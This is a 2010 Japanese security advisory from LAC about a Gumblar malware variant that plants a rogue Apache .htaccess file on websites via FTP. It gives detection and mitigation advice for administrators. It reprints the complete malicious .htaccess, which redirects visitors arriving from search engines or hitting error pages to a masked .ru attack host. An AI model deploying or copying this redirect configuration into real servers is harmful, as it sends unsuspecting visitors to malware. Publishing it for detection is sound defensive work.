セキュリティ情報


【注意喚起】Gumblar(ガンブラー)ウイルスによる新たなホームページ改ざん被害を確認

  • [注意喚起]
  • 2010年 03月 03日

※本注意喚起は、2009年12月25日【Gumblar(ガンブラー)ウイルスの組織内感染拡大とホームページ改ざん被害増加に伴う対策の確認】の続報です。

内容

2010年3月4日 「.htaccessを悪用した新たなGumblar攻撃」の解説動画を公開しました。

株式会社ラックでは、Apacheの設定ファイルである「.htaccess」の不正アップロードを行うGumblarウイルスの活動を複数サイトにおいて確認しました。現在判明していることは次のような内容です。

【攻撃確認日】

  • LACがこの攻撃を最初に認識したのは2010年3月1日です
  • FTP転送のログから、少なくとも2010年1月上旬にはこの攻撃が発生していたと推測しています

【動作概要】

この.htaccessファイルが置かれる影響は、主要検索サイトからのアクセス、および404、403などのエラーがApacheのリダイレクト機能で攻撃サイトに転送されることです。攻撃サイトに転送された後、他のGumblar攻撃と同様に、悪性プログラムの感染被害に遭われることが推測されます。

【従来型Gumblarとの相違点】

従来のGumblar攻撃と異なる点は、次の2点が判明しています。

1. ユーザはJavaScriptの対策だけでは防げない
Firefox + NoScriptの組み合わせでは防げない可能性があり、RequestPolicyなどのリダイレクト対策が可能なアドオンを利用する必要があります。
2. コンテンツファイル監視だけでは気付くことができない
コンテンツファイル自体は改ざんされておらず、さらにブックマーク(お気に入り)やURL直接入力でサイトを表示した場合は影響を受けないため、Webサイト管理者が被害に気付きにくい。

【Webサーバ管理者の対策】

身に覚えのない.htaccessファイルが存在しないかを確認してください。FTP転送ログで.htaccessファイルがアップロードされていないかを確認するのも有効です。

確認されたログのサンプル

FTP
Jan dd hh:mm:ss 2010 1 x.x.x.x 1278 /home/xxxx/.htaccess b _ i r xxxx ftp 0 * c

※現在のところ、トップディレクトリに単発でアップロードされていることを確認しています。

アップロードされる「.htaccess」ファイル

# HostRule
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule ^(.*)$ http://********.ru/ [R=301,L]

ErrorDocument 401 http://********.ru/
ErrorDocument 403 http://********.ru/
ErrorDocument 404 http://********.ru/
ErrorDocument 500 http://********.ru/
# /HostRule 

 

follow me on twitter

 

【本注意喚起に関するお問い合わせ先】
株式会社ラック サイバー救急センター
電話:03-5537-0119 / E-Mail: p119@lac.co.jp

以上

対策

身に覚えのない.htaccessファイルが存在しないかを確認してください。FTP転送ログで.htaccessファイルがアップロードされていないかを確認するのも有効です。

ピックアップ
エネルギー管理ソリューション
標的方攻撃対策支援サービス
セキュリティ診断サービス